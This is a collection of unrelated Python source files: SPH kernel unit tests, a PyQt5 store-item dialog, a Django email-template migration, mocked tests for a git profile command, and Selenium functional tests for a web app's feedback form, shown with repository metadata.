class TestGaussian2D(TestCubicSpline2D):
kernel_factory = staticmethod(lambda: Gaussian(dim=2))
def test_simple(self):
self.check_kernel_at_origin(1.0 / np.pi)
def test_zeroth_kernel_moments(self):
r = self.check_kernel_moment_2d(0, 0)
self.assertAlmostEqual(r, 1.0, 3)
def test_first_grad_moment(self):
r = self.check_gradient_moment_2d(1, 0)
self.assertAlmostEqual(r[0], -1.0, 2)
self.assertAlmostEqual(r[1], 0.0, 8)
r = self.check_gradient_moment_2d(0, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], -1.0, 2)
r = self.check_gradient_moment_2d(1, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], 0.0, 8)
class TestGaussian3D(TestCubicSpline3D):
kernel_factory = staticmethod(lambda: Gaussian(dim=3))
def test_simple(self):
self.check_kernel_at_origin(1.0 / pow(np.pi, 1.5))
def test_zeroth_kernel_moments(self):
r = self.check_kernel_moment_3d(0, 0, 0)
self.assertAlmostEqual(r, 1.0, 2)
def test_first_grad_moment(self):
r = self.check_gradient_moment_3d(1, 0, 0)
self.assertAlmostEqual(r[0], -1.0, 2)
self.assertAlmostEqual(r[1], 0.0, 8)
self.assertAlmostEqual(r[2], 0.0, 8)
r = self.check_gradient_moment_3d(0, 1, 0)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], -1.0, 2)
self.assertAlmostEqual(r[2], 0.0, 6)
r = self.check_gradient_moment_3d(0, 0, 1)
self.assertAlmostEqual(r[0], 0.0, 8)
self.assertAlmostEqual(r[1], 0.0, 8)
self.assertAlmostEqual(r[2], -1.0, 2)
###############################################################################
# Quintic spline kernel
class TestQuinticSpline1D(TestCubicSpline1D):
kernel_factory = staticmethod(lambda: QuinticSpline(dim=1))
def test_simple(self):
self.check_kernel_at_origin(0.55)
class TestQuinticSpline2D(TestCubicSpline2D):
kernel_factory = staticmethod(lambda: QuinticSpline(dim=2))
def test_simple(self):
self.check_kernel_at_origin(66.0 * 7.0 / (478.0 * np.pi))
class TestQuinticSpline3D(TestGaussian3D):
kernel_factory = staticmethod(lambda: QuinticSpline(dim=3))
def test_simple(self):
self.check_kernel_at_origin(66.0 * 1.0 / (120.0 * np.pi))
###############################################################################
# SuperGaussian kernel
class TestSuperGaussian1D(TestGaussian1D):
    kernel_factory = staticmethod(lambda: SuperGaussian(dim=1))

    def test_simple(self):
        self.check_kernel_at_origin(1.5 / np.sqrt(np.pi))

    def test_first_grad_moment(self):
        kh = self.wrapper.radius_scale
        r = self.check_grad_moment_1d(0.0, 2 * kh, 1.0, 1, xj=kh)
        self.assertAlmostEqual(r, -1.0, 2)

    def test_zeroth_kernel_moments(self):
        kh = self.wrapper.radius_scale
        # Zeroth moment.
        r = self.check_kernel_moment_1d(-kh, kh, 1.0, 0, xj=0)
        self.assertAlmostEqual(r, 1.0, 3)
        # Use a non-unit h.
        r = self.check_kernel_moment_1d(-kh, kh, 0.5, 0, xj=0)
        self.assertAlmostEqual(r, 1.0, 3)
        r = self.check_kernel_moment_1d(0.0, 2 * kh, 1.0, 0, xj=kh)
        self.assertAlmostEqual(r, 1.0, 3)


class TestSuperGaussian2D(TestGaussian2D):
    kernel_factory = staticmethod(lambda: SuperGaussian(dim=2))

    def test_simple(self):
        self.check_kernel_at_origin(2.0 / np.pi)

    def test_zeroth_kernel_moments(self):
        r = self.check_kernel_moment_2d(0, 0)
        self.assertAlmostEqual(r, 1.0, 2)

    def test_first_grad_moment(self):
        r = self.check_gradient_moment_2d(1, 0)
        self.assertAlmostEqual(r[0], -1.0, 1)
        self.assertAlmostEqual(r[1], 0.0, 8)
        r = self.check_gradient_moment_2d(0, 1)
        self.assertAlmostEqual(r[0], 0.0, 8)
        self.assertAlmostEqual(r[1], -1.0, 1)
        r = self.check_gradient_moment_2d(1, 1)
        self.assertAlmostEqual(r[0], 0.0, 8)
        self.assertAlmostEqual(r[1], 0.0, 8)


class TestSuperGaussian3D(TestGaussian3D):
    kernel_factory = staticmethod(lambda: SuperGaussian(dim=3))

    def test_simple(self):
        self.check_kernel_at_origin(5.0 / (2.0 * pow(np.pi, 1.5)))

    def test_first_grad_moment(self):
        r = self.check_gradient_moment_3d(1, 0, 0)
        self.assertAlmostEqual(r[0], -1.0, 1)
        self.assertAlmostEqual(r[1], 0.0, 8)
        self.assertAlmostEqual(r[2], 0.0, 8)
        r = self.check_gradient_moment_3d(0, 1, 0)
        self.assertAlmostEqual(r[0], 0.0, 8)
        self.assertAlmostEqual(r[1], -1.0, 1)
        self.assertAlmostEqual(r[2], 0.0, 6)
        r = self.check_gradient_moment_3d(0, 0, 1)
        self.assertAlmostEqual(r[0], 0.0, 8)
        self.assertAlmostEqual(r[1], 0.0, 8)
        self.assertAlmostEqual(r[2], -1.0, 1)
###############################################################################
# WendlandQuintic C2 kernel
class TestWendlandQuintic2D(TestCubicSpline2D):
    kernel_factory = staticmethod(lambda: WendlandQuintic(dim=2))

    def test_simple(self):
        self.check_kernel_at_origin(7.0 / (4.0 * np.pi))

    def test_zeroth_kernel_moments(self):
        r = self.check_kernel_moment_2d(0, 0)
        self.assertAlmostEqual(r, 1.0, 6)


class TestWendlandQuintic3D(TestGaussian3D):
    kernel_factory = staticmethod(lambda: WendlandQuintic(dim=3))

    def test_simple(self):
        self.check_kernel_at_origin(21.0 / (16.0 * np.pi))


class TestWendlandQuintic1D(TestCubicSpline1D):
    kernel_factory = staticmethod(lambda: WendlandQuinticC2_1D(dim=1))

    def test_simple(self):
        self.check_kernel_at_origin(5.0 / 8.0)

    def test_zeroth_kernel_moments(self):
        kh = self.wrapper.radius_scale
        # Zeroth moment.
        r = self.check_kernel_moment_1d(-kh, kh, 1.0, 0, xj=0)
        self.assertAlmostEqual(r, 1.0, 8)
        # Use a non-unit h.
        r = self.check_kernel_moment_1d(-kh, kh, 0.5, 0, xj=0)
        self.assertAlmostEqual(r, 1.0, 7)
        r = self.check_kernel_moment_1d(0.0, 2 * kh, 1.0, 0, xj=kh)
        self.assertAlmostEqual(r, 1.0, 7)

    def test_first_grad_moment(self):
        kh = self.wrapper.radius_scale
        r = self.check_grad_moment_1d(0.0, 2 * kh, 1.0, 1, xj=kh)
        self.assertAlmostEqual(r, -1.0, 7)
###############################################################################
# WendlandQuintic C4 kernel
class TestWendlandQuinticC4_2D(TestCubicSpline2D):
    kernel_factory = staticmethod(lambda: WendlandQuinticC4(dim=2))

    def test_simple(self):
        self.check_kernel_at_origin(9.0 / (4.0 * np.pi))


class TestWendlandQuinticC4_3D(TestGaussian3D):
    kernel_factory = staticmethod(lambda: WendlandQuinticC4(dim=3))

    def test_simple(self):
        self.check_kernel_at_origin(495.0 / (256.0 * np.pi))


class TestWendlandQuinticC4_1D(TestCubicSpline1D):
    kernel_factory = staticmethod(lambda: WendlandQuinticC4_1D(dim=1))

    def test_simple(self):
        self.check_kernel_at_origin(3.0 / 4.0)
###############################################################################
# WendlandQuintic C6 kernel
class TestWendlandQuinticC6_2D(TestCubicSpline2D):
    kernel_factory = staticmethod(lambda: WendlandQuinticC6(dim=2))

    def test_simple(self):
        self.check_kernel_at_origin(78.0 / (28.0 * np.pi))


class TestWendlandQuinticC6_3D(TestGaussian3D):
    kernel_factory = staticmethod(lambda: WendlandQuinticC6(dim=3))

    def test_simple(self):
        self.check_kernel_at_origin(1365.0 / (512.0 * np.pi))


class TestWendlandQuinticC6_1D(TestCubicSpline1D):
    kernel_factory = staticmethod(lambda: WendlandQuinticC6_1D(dim=1))

    def test_simple(self):
        self.check_kernel_at_origin(55.0 / 64.0)
if __name__ == '__main__':
    main()
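The normalization constants asserted above can be sanity-checked independently of the test harness. A minimal sketch (not part of the original suite; the kernel is re-implemented inline rather than imported from the library): numerically integrating the standard 1D cubic spline, whose 2/3 factor should make its zeroth moment equal 1 over the support [-2h, 2h] with h = 1, mirrors what `check_kernel_moment_1d` verifies.

```python
import numpy as np


def cubic_spline_1d(q):
    """Standard M4 cubic spline in 1D (sigma = 2/3), support |q| < 2."""
    q = np.abs(q)
    w = np.where(q < 1.0, 1.0 - 1.5 * q ** 2 + 0.75 * q ** 3,
                 np.where(q < 2.0, 0.25 * (2.0 - q) ** 3, 0.0))
    return (2.0 / 3.0) * w


x = np.linspace(-2.0, 2.0, 20001)
w = cubic_spline_1d(x)
# Trapezoidal rule written out by hand so it works on any NumPy version.
zeroth_moment = float(np.sum(0.5 * (w[1:] + w[:-1]) * np.diff(x)))
assert abs(zeroth_moment - 1.0) < 1e-6
```

The same approach extends to the gradient-moment checks: integrating x * W'(x) over the support should give -1.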
# File: design2.py (repo: arashdeveloper1380/Store-software-with-PyQT, license: Apache-2.0)
from PyQt5 import QtCore, QtGui, QtWidgets


class Ui_Dialogadd(object):
    def setupUi(self, Dialog):
        Dialog.setObjectName("Dialog")
        Dialog.resize(366, 162)
        Dialog.setMinimumSize(QtCore.QSize(366, 162))
        Dialog.setMaximumSize(QtCore.QSize(366, 162))
        palette = QtGui.QPalette()
        # The Designer-generated code repeats the same three-line brush
        # pattern for every colour-group/role pair; the table-driven loop
        # below sets exactly the same brushes.
        base_colors = {
            QtGui.QPalette.WindowText: (0, 0, 0),
            QtGui.QPalette.Button: (102, 184, 255),
            QtGui.QPalette.Light: (230, 244, 255),
            QtGui.QPalette.Midlight: (166, 214, 255),
            QtGui.QPalette.Dark: (51, 92, 127),
            QtGui.QPalette.Mid: (68, 123, 170),
            QtGui.QPalette.Text: (0, 0, 0),
            QtGui.QPalette.BrightText: (255, 255, 255),
            QtGui.QPalette.ButtonText: (0, 0, 0),
            QtGui.QPalette.Base: (255, 255, 255),
            QtGui.QPalette.Window: (102, 184, 255),
            QtGui.QPalette.Shadow: (0, 0, 0),
            QtGui.QPalette.AlternateBase: (178, 219, 255),
            QtGui.QPalette.ToolTipBase: (255, 255, 220),
            QtGui.QPalette.ToolTipText: (0, 0, 0),
        }
        # Disabled state: the text roles are greyed out and base/alternate
        # base use the button colour; all other roles match the active state.
        disabled_colors = dict(base_colors)
        disabled_colors.update({
            QtGui.QPalette.WindowText: (51, 92, 127),
            QtGui.QPalette.Text: (51, 92, 127),
            QtGui.QPalette.ButtonText: (51, 92, 127),
            QtGui.QPalette.Base: (102, 184, 255),
            QtGui.QPalette.AlternateBase: (102, 184, 255),
        })
        for group, colors in ((QtGui.QPalette.Active, base_colors),
                              (QtGui.QPalette.Inactive, base_colors),
                              (QtGui.QPalette.Disabled, disabled_colors)):
            for role, rgb in colors.items():
                brush = QtGui.QBrush(QtGui.QColor(*rgb))
                brush.setStyle(QtCore.Qt.SolidPattern)
                palette.setBrush(group, role, brush)
        Dialog.setPalette(palette)
        self.lineEdit = QtWidgets.QLineEdit(Dialog)
        self.lineEdit.setGeometry(QtCore.QRect(40, 50, 161, 31))
        self.lineEdit.setFrame(True)
        self.lineEdit.setObjectName("lineEdit")
        self.label = QtWidgets.QLabel(Dialog)
        self.label.setGeometry(QtCore.QRect(220, 60, 47, 21))
        self.label.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.label.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.label.setLineWidth(10)
        self.label.setTextFormat(QtCore.Qt.AutoText)
        self.label.setAlignment(QtCore.Qt.AlignCenter)
        self.label.setObjectName("label")
        self.lineEdit_2 = QtWidgets.QLineEdit(Dialog)
        self.lineEdit_2.setGeometry(QtCore.QRect(40, 90, 161, 31))
        self.lineEdit_2.setFrame(True)
        self.lineEdit_2.setObjectName("lineEdit_2")
        self.label_2 = QtWidgets.QLabel(Dialog)
        self.label_2.setGeometry(QtCore.QRect(220, 100, 47, 21))
        self.label_2.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.label_2.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.label_2.setLineWidth(10)
        self.label_2.setTextFormat(QtCore.Qt.AutoText)
        self.label_2.setAlignment(QtCore.Qt.AlignCenter)
        self.label_2.setObjectName("label_2")
        self.pushButton = QtWidgets.QPushButton(Dialog)
        self.pushButton.setGeometry(QtCore.QRect(40, 130, 231, 23))
        self.pushButton.setObjectName("pushButton")
        self.label_3 = QtWidgets.QLabel(Dialog)
        self.label_3.setGeometry(QtCore.QRect(0, 10, 361, 31))
        self.label_3.setFrameShape(QtWidgets.QFrame.StyledPanel)
        self.label_3.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.label_3.setLineWidth(10)
        self.label_3.setTextFormat(QtCore.Qt.AutoText)
        self.label_3.setAlignment(QtCore.Qt.AlignCenter)
        self.label_3.setObjectName("label_3")

        self.retranslateUi(Dialog)
        QtCore.QMetaObject.connectSlotsByName(Dialog)
    def check_line(self):
        self.t1 = self.lineEdit.text()
        self.t2 = self.lineEdit_2.text()
        print(self.t1, ' ', self.t2)
        if self.t1 != '' and self.t2 != '':
            return self.t1, self.t2
        else:
            return -1, -1
    def retranslateUi(self, Dialog):
        _translate = QtCore.QCoreApplication.translate
        Dialog.setWindowTitle(_translate("Dialog", "Dialog"))
        self.label.setText(_translate("Dialog", "نام کالا:"))  # "Product name:"
        self.label_2.setText(_translate("Dialog", "کد کالا:"))  # "Product code:"
        self.pushButton.setText(_translate("Dialog", "اضافه شدن"))  # "Add"
        # "!!! If you fill in both lines and no duplicate exists, the item will be added !!!"
        self.label_3.setText(_translate("Dialog", "!!! اگر هر دو خط را کامل کنید و مشابه آن موجود نباشد کالا اضافه می شود!!!"))
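The `check_line` method above mixes validation logic with widget access. An illustrative sketch (a hypothetical helper, not part of the generated module): the same rule extracted as a pure function, so it can be unit-tested without constructing any Qt widgets.

```python
def validate_item_fields(name, code):
    """Mirror the check_line rule: return (name, code) when both fields
    are non-empty, otherwise the (-1, -1) sentinel the dialog uses."""
    if name != '' and code != '':
        return name, code
    return -1, -1


# Usage: the dialog would call this with lineEdit.text() and
# lineEdit_2.text() instead of reading the widgets directly.
assert validate_item_fields('chair', 'A17') == ('chair', 'A17')
assert validate_item_fields('', 'A17') == (-1, -1)
```

Keeping validation separate from the auto-generated `Ui_*` class also survives regeneration of the UI file by Qt Designer.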
# File: emailtemplates/migrations/0001_initial.py (repo: deployed/django-emailtemplates, license: MIT)
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-31 14:23
from __future__ import unicode_literals

from django.db import migrations, models
import django.utils.timezone


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='EmailTemplate',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(choices=[(b'accounts/activation.html', b'accounts/activation.html'), (b'project/introduction_project_mail_1d.html', b'project/introduction_project_mail_1d.html'), (b'project/notice_original_deletion_3days.html', b'project/notice_original_deletion_3days.html'), (b'accounts/password_reset_email.html', b'accounts/password_reset_email.html'), (b'accounts/email_verification.html', b'accounts/email_verification.html'), (b'share/invitation.html', b'share/invitation.html'), (b'orders/cancelled_payment.html', b'orders/cancelled_payment.html'), (b'project/new_template_available.html', b'project/new_template_available.html'), (b'supports/feedback_email.html', b'supports/feedback_email.html'), (b'invitations/invite_friend.html', b'invitations/invite_friend.html'), (b'project/introduction_project_mail_2d.html', b'project/introduction_project_mail_2d.html'), (b'share/invitation_subject.html', b'share/invitation_subject.html'), (b'orders/delivered.html', b'orders/delivered.html'), (b'project/project_action_notification.html', b'project/project_action_notification.html'), (b'project/notice_original_deletion_1week.html', b'project/notice_original_deletion_1week.html'), (b'accounts/welcome.html', b'accounts/welcome.html'), (b'project/download_zip.html', b'project/download_zip.html'), (b'orders/in_production.html', b'orders/in_production.html'), (b'project/notice_original_deletion_1month.html', b'project/notice_original_deletion_1month.html'), (b'accounts/introducing_email_4d.html', b'accounts/introducing_email_4d.html'), (b'orders/reorder_incentive_mail.html', b'orders/reorder_incentive_mail.html'), (b'project/project_action_like_comment_notification.html', b'project/project_action_like_comment_notification.html'), (b'accounts/introducing_email_2d.html', b'accounts/introducing_email_2d.html'), (b'project/package_expired.html', b'project/package_expired.html'), (b'project/package_upgrade.html', b'project/package_upgrade.html'), 
(b'project/introduction_project_mail_7d.html', b'project/introduction_project_mail_7d.html'), (b'subscriptions/subscription_email.html', b'subscriptions/subscription_email.html'), (b'accounts/introducing_email_3d.html', b'accounts/introducing_email_3d.html'), (b'accounts/introducing_email_1d.html', b'accounts/introducing_email_1d.html'), (b'supports/support_request.html', b'supports/support_request.html'), (b'supports/support_confirm.html', b'supports/support_confirm.html')], max_length=255, verbose_name='template')),
                ('subject', models.CharField(blank=True, max_length=255, verbose_name='subject')),
                ('content', models.TextField(verbose_name='content')),
                ('language', models.CharField(choices=[(b'de', b'German')], default=b'de', max_length=10, verbose_name='language')),
                ('created', models.DateTimeField(default=django.utils.timezone.now)),
                ('modified', models.DateTimeField(default=django.utils.timezone.now)),
            ],
        ),
        migrations.AlterUniqueTogether(
            name='emailtemplate',
            unique_together=set([('title', 'language')]),
        ),
    ]
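The long `choices` list in the `title` field above pairs each template path with itself as its display label. A small sketch (an assumption about how such lists are typically produced, not code from this repository): generating the identical (value, label) pairs from a flat list of paths keeps such a field definition readable and avoids copy-paste drift between value and label.

```python
def as_choices(paths):
    # Each template path doubles as its own display label, matching the
    # (value, value) pairs in the CharField choices above.
    return [(p, p) for p in paths]


# Hypothetical subset of the template paths from the migration.
TEMPLATE_CHOICES = as_choices([
    'accounts/activation.html',
    'share/invitation.html',
    'orders/delivered.html',
])
```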
8686adc1d98f5e11b8099acdfadeaaf8b3f61d1c | 82 | py | Python | cherry/runner/__init__.py | vishalbelsare/cherry-pytorch | 7a05b488de1f4a5de52fe7d0f5e639b381da42d4 | [
"MIT"
] | 11 | 2020-01-28T15:40:25.000Z | 2021-01-02T23:09:05.000Z | cherry/runner/__init__.py | vishalbelsare/cherry-pytorch | 7a05b488de1f4a5de52fe7d0f5e639b381da42d4 | [
"MIT"
] | 30 | 2019-12-14T12:11:07.000Z | 2020-01-29T10:56:13.000Z | cherry/runner/__init__.py | vishalbelsare/cherry-pytorch | 7a05b488de1f4a5de52fe7d0f5e639b381da42d4 | [
"MIT"
] | 1 | 2020-01-29T13:15:46.000Z | 2020-01-29T13:15:46.000Z | from cherry.runner.trainer import Trainer
from cherry.runner.player import Player
869020b15db82244db9b587af332e454775e72c2 | 2,204 | py | Python | test/test_gits_profile.py | oaaky/GITS | 2254f298df158b5d085015c4cf9b542b059b3a6c | [
"MIT"
] | 2 | 2020-11-11T08:45:07.000Z | 2021-09-02T18:36:21.000Z | test/test_gits_profile.py | oaaky/GITS | 2254f298df158b5d085015c4cf9b542b059b3a6c | [
"MIT"
] | 24 | 2020-10-01T16:55:05.000Z | 2020-10-27T02:51:25.000Z | test/test_gits_profile.py | oaaky/GITS | 2254f298df158b5d085015c4cf9b542b059b3a6c | [
"MIT"
] | 15 | 2020-10-02T03:43:30.000Z | 2021-10-01T03:48:32.000Z | import argparse
import os
import sys
sys.path.insert(1, os.getcwd())
from gits_profile import gits_set_profile
from mock import patch, Mock
def parse_args(args):
parser = argparse.ArgumentParser()
return parser.parse_args(args)
@patch("argparse.ArgumentParser.parse_args",
return_value=argparse.Namespace(email="email@address.com", name="name"))
@patch("subprocess.Popen")
def test_gits_profile_happy_case(mock_var, mock_args):
"""
Function to test gits profile, success case
"""
mocked_pipe = Mock()
attrs = {'communicate.return_value': ('output'.encode('UTF-8'), 'error'), 'returncode': 0}
mocked_pipe.configure_mock(**attrs)
mock_var.return_value = mocked_pipe
mock_args = parse_args(mock_args)
test_result = gits_set_profile(mock_args)
if test_result:
assert True, "Normal Case"
else:
assert False
@patch("argparse.ArgumentParser.parse_args",
return_value=argparse.Namespace(email="email", name="name"))
@patch("subprocess.Popen")
def test_gits_profile_sad_case_invalid_email(mock_var, mock_args):
"""
Function to test gits profile, failure case when email is invalid
"""
mocked_pipe = Mock()
attrs = {'communicate.return_value': ('output'.encode('UTF-8'), 'error'), 'returncode': 0}
mocked_pipe.configure_mock(**attrs)
mock_var.return_value = mocked_pipe
mock_args = parse_args(mock_args)
test_result = gits_set_profile(mock_args)
if not test_result:
assert True, "Normal Case"
else:
assert False
@patch("argparse.ArgumentParser.parse_args",
return_value=argparse.Namespace())
@patch("subprocess.Popen")
def test_gits_profile_sad_case_no_arguments(mock_var, mock_args):
"""
Function to test gits profile, failure case when no arguments are passed
"""
mocked_pipe = Mock()
attrs = {'communicate.return_value': ('output'.encode('UTF-8'), 'error'), 'returncode': 0}
mocked_pipe.configure_mock(**attrs)
mock_var.return_value = mocked_pipe
mock_args = parse_args(mock_args)
test_result = gits_set_profile(mock_args)
if not test_result:
assert True, "Normal Case"
else:
assert False
| 29.783784 | 94 | 0.705989 | 292 | 2,204 | 5.061644 | 0.219178 | 0.064953 | 0.060893 | 0.064953 | 0.81935 | 0.81935 | 0.81935 | 0.81935 | 0.81935 | 0.694858 | 0 | 0.003861 | 0.177405 | 2,204 | 73 | 95 | 30.191781 | 0.811362 | 0.082577 | 0 | 0.686275 | 0 | 0 | 0.183704 | 0.088057 | 0 | 0 | 0 | 0 | 0.117647 | 1 | 0.078431 | false | 0 | 0.098039 | 0 | 0.196078 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
8692555f43b25fbc923894859c25e1a7e3d4fc52 | 11,532 | py | Python | dirigible/fts/tests/test_2884_FeedbackForm.py | EnoX1/dirigible-spreadsheet | 9a3289c67a93c40190565ad5a555710c50c5f958 | [
"MIT"
] | 168 | 2015-01-03T02:09:30.000Z | 2022-03-31T22:28:00.000Z | dirigible/fts/tests/test_2884_FeedbackForm.py | EnoX1/dirigible-spreadsheet | 9a3289c67a93c40190565ad5a555710c50c5f958 | [
"MIT"
] | 4 | 2017-03-14T20:49:49.000Z | 2020-04-02T16:13:00.000Z | dirigible/fts/tests/test_2884_FeedbackForm.py | EnoX1/dirigible-spreadsheet | 9a3289c67a93c40190565ad5a555710c50c5f958 | [
"MIT"
] | 46 | 2015-01-18T04:39:24.000Z | 2022-02-17T22:33:05.000Z | # Copyright (c) 2010 Resolver Systems Ltd.
# All Rights Reserved
#
from functionaltest import FunctionalTest, Url
class Test_2884_FeedbackForm(FunctionalTest):
def tearDown(self):
FunctionalTest.tearDown(self)
self.clear_email_for_address(
'harold.testuser-admin@projectdirigible.com',
content_filter=self.get_my_username()
)
def test_feedback_dialog_from_non_logged_in_page(self):
# * Harold is not logged in, and goes to the root Dirigible page.
self.go_to_url(Url.ROOT)
# * he clicks the feedback link
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * titled:
self.assertEquals('Help us improve',
self.get_text('css=.ui-dialog-title')
)
# * with some friendly text:
self.assertEquals(
"It's always a pleasure to hear from you!",
self.get_text('css=#id_feedback_dialog_blurb_big')
)
self.assertEquals(
"Ask us a question, or tell us what you love or hate about Dirigible:",
self.get_text('css=#id_feedback_dialog_blurb_small')
)
# * with a big freeform input field
# which has the focus
self.wait_for_element_visibility('id=id_feedback_dialog_text', True)
self.assertTrue(self.is_element_focused('id=id_feedback_dialog_text'))
# * an email field:
self.wait_for_element_visibility('id=id_feedback_dialog_email_address', True)
# The email field has a value indicating what it's for:
self.assertEquals(
"Email address (optional - only necessary if you would like us to contact you)",
self.selenium.get_value('id=id_feedback_dialog_email_address')
)
# * that is grey
self.assertEquals(self.get_css_property('#id_feedback_dialog_email_address', 'color'), '#808080')
self.assertEquals(self.get_css_property('#id_feedback_dialog_email_address', 'font-style'), 'italic')
# * and ok and cancel buttons
self.wait_for_element_visibility('id=id_feedback_dialog_ok_button', True)
self.wait_for_element_visibility('id=id_feedback_dialog_cancel_button', True)
# * He enters some text into the message field
MESSAGE = 'Dear Sirs, your product is teh awesomez!!! love ' + self.get_my_username()
self.selenium.type('id=id_feedback_dialog_text', MESSAGE)
# * He decides he wants us to be able to thank him for his kind words, so he moves to the
# email field
self.selenium.focus('id=id_feedback_dialog_email_address')
# * The prompt text disappears, and the field switches to non-italic non-grey text
self.assertEquals(
"",
self.selenium.get_value('id=id_feedback_dialog_email_address')
)
self.assertEquals(self.get_css_property('#id_feedback_dialog_email_address', 'color'), '#000000')
self.assertEquals(self.get_css_property('#id_feedback_dialog_email_address', 'font-style'), 'normal')
# * He types his email address
SUBMITTED_EMAIL_ADDRESS = 'harold@mailinator.com'
self.selenium.type('id=id_feedback_dialog_email_address', SUBMITTED_EMAIL_ADDRESS)
# * Hits cancel and the form goes away wthout doing anything
self.selenium.click('id=id_feedback_dialog_cancel_button')
self.wait_for_element_visibility('id=id_feedback_dialog', False)
# * this time he means it, so he opens the form again
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * His message and email are still there.
self.assertEquals(
MESSAGE,
self.selenium.get_value('id=id_feedback_dialog_text')
)
self.assertEquals(
SUBMITTED_EMAIL_ADDRESS,
self.selenium.get_value('id=id_feedback_dialog_email_address')
)
# He clicks OK.
self.selenium.click('id=id_feedback_dialog_ok_button')
# * The dialog goes away
self.wait_for_element_visibility('id=id_feedback_dialog', False)
# * support@resolversystems.com receives an email with the text he
# entered and his email address
fromm, to, subject, body = self.pop_email_for_client(
'harold.testuser-admin@projectdirigible.com',
content_filter=self.get_my_username()
)
self.assertEquals(fromm, 'support@projectdirigible.com')
self.assertEquals(to, 'harold.testuser-admin@projectdirigible.com')
self.assertEquals(subject, '[Django] User feedback from Dirigible')
self.assertTrue(MESSAGE in body)
self.assertTrue(SUBMITTED_EMAIL_ADDRESS in body)
self.assertTrue("Page: %s" % (self.browser.current_url,) in body)
def test_feedback_dialog_from_logged_in_dashboard(self):
# * Harold logs in to Dirigible
sheet_id = self.login()
# * he clicks the feedback link
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * titled:
self.assertEquals('Help us improve',
self.get_text('css=.ui-dialog-title')
)
# * with some friendly text:
self.assertEquals(
"It's always a pleasure to hear from you!",
self.get_text('css=#id_feedback_dialog_blurb_big')
)
self.assertEquals(
"Ask us a question, or tell us what you love or hate about Dirigible:",
self.get_text('css=#id_feedback_dialog_blurb_small')
)
# * with a big freeform input field
# which has the focus
self.wait_for_element_visibility('id=id_feedback_dialog_text', True)
self.assertTrue(self.is_element_focused('id=id_feedback_dialog_text'))
# * There is no email field
self.wait_for_element_visibility('id=id_feedback_dialog_email_address', False)
# * and ok and cancel buttons
self.wait_for_element_visibility('id=id_feedback_dialog_ok_button', True)
self.wait_for_element_visibility('id=id_feedback_dialog_cancel_button', True)
# * He enters some text into the message field
MESSAGE = 'Dear Sirs, your product is teh awesomez!!! love ' + self.get_my_username()
self.selenium.type('id=id_feedback_dialog_text', MESSAGE)
# * Hits cancel and the form goes away wthout doing anything
self.selenium.click('id=id_feedback_dialog_cancel_button')
self.wait_for_element_visibility('id=id_feedback_dialog', False)
# * this time he means it, so he opens the form again
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * His message is still there.
self.assertEquals(
MESSAGE,
self.selenium.get_value('id=id_feedback_dialog_text')
)
# * He hits OK
self.selenium.click('id=id_feedback_dialog_ok_button')
# * The dialog goes away
self.wait_for_element_visibility('id=id_feedback_dialog', False)
# * support@resolversystems.com receives an email with the text he
# entered and his username
fromm, to, subject, body = self.pop_email_for_client(
'harold.testuser-admin@projectdirigible.com',
content_filter=self.get_my_username()
)
self.assertEquals(fromm, 'support@projectdirigible.com')
self.assertEquals(to, 'harold.testuser-admin@projectdirigible.com')
self.assertEquals(subject, '[Django] User feedback from Dirigible')
self.assertTrue(MESSAGE in body)
self.assertTrue("Username: %s" % (self.get_my_username(),) in body)
self.assertTrue("Page: %s" % (self.browser.current_url,) in body)
def test_feedback_dialog_displays_submission_status(self):
# * Harold is not logged in, and goes to the root Dirigible page.
self.go_to_url(Url.ROOT)
self.selenium.get_eval("""
(function () {
var oldAjax = window.$.ajax;
function slowAjax(params) {
setTimeout(
function() { oldAjax(params); },
7000
);
}
window.$.ajax = slowAjax;
})()
""");
# * he clicks the feedback link
self.selenium.click('link=Feedback')
self.wait_for_element_visibility('id=id_feedback_dialog', True)
# * He enters some text into the message field
MESSAGE = 'Dear Sirs, your product is teh awesomez!!! love ' + self.get_my_username()
self.selenium.type('id=id_feedback_dialog_text', MESSAGE)
# * He types his email address
SUBMITTED_EMAIL_ADDRESS = 'harold@mailinator.com'
self.selenium.type('id=id_feedback_dialog_email_address', SUBMITTED_EMAIL_ADDRESS)
# Something goes wrong with the Dirigible server
old_feedback_url = self.selenium.get_eval("window.urls.feedback")
self.selenium.get_eval("window.urls.feedback = 'blergh'")
# Blissfully unaware of this, Harold clicks OK.
self.selenium.click('id=id_feedback_dialog_ok_button')
# The dialog remains, the buttons go disabled
self.wait_for(
lambda: not self.is_element_enabled('id_feedback_dialog_ok_button'),
lambda: 'ok button to become disabled'
)
self.wait_for(
lambda: not self.is_element_enabled('id_feedback_dialog_cancel_button'),
lambda: 'cancel button to become disabled'
)
# an error div appears to tell him that something is wrong.
self.wait_for_element_visibility('id=id_feedback_dialog', True)
self.wait_for_element_visibility('id=id_feedback_dialog_error', True)
# the buttons become enabled again
self.wait_for(
lambda: self.is_element_enabled('id_feedback_dialog_ok_button'),
lambda: 'ok button to become enabled'
)
self.wait_for(
lambda: self.is_element_enabled('id_feedback_dialog_cancel_button'),
lambda: 'cancel button to become enabled'
)
# He waits for a moment, and the server magically fixes itself.
self.selenium.get_eval("window.urls.feedback = '%s'" % (old_feedback_url,))
